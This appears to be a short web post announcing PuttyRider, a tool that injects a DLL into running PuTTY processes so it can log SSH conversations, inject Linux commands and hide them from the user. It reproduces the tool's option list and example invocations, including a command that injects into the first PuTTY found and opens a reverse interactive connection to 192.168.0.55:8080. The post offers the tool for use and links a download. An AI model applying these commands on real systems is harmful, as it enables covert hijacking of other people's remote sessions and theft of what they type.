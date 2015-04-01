PuttyRider - Tool To Hijack Putty Sessions

PuttyRider is an open source tool to hijack Putty sessions in order to sniff conversation and inject Linux commands.

Compiling:

Use Visual Studio Command Prompt:
nmake main dll

Usage:

Operation modes:
 -l              List the running Putty processes and their connections
 -w              Inject in all existing Putty sessions and wait for new sessions
                 to inject in those also
 -p              PID  Inject only in existing Putty session identified by PID.
                 If PID==0, inject in the first Putty found
 -x              Cleanup. Remove the DLL from all running Putty instances
 -d              Debug mode. Only works with -p mode
 -c              CMD  Automatically execute a Linux command after successful injection
                 PuttyRider will remove trailing spaces and '&' character from CMD
                 PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
 -h              Print this help

Output modes:
 -f              Write all Putty conversation to a file in the local directory.
                 The filename will have the PID of current putty.exe appended
 -r              IP:PORT Initiate a reverse connection to the specified machine and
                 start an interactive session.

Interactive commands (after you receive a reverse connection):
 !status         See if the Putty window is connected to user input
 !discon         Disconnect the main Putty window so it won't display anything
                 This is useful to send commands without the user to notice
 !recon          Reconnect the Putty window to its normal operation mode
 CMD             Linux shell commands
 !exit           Terminate this connection
 !help           Display help for client connection


Examples:

  • List existing Putty processes and their status (injected / not injected)
PuttyRider.exe -l
  • Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
  • Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.
PuttyRider.exe -w -f
  • Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)
PuttyRider.exe -x


Download PuttyRider

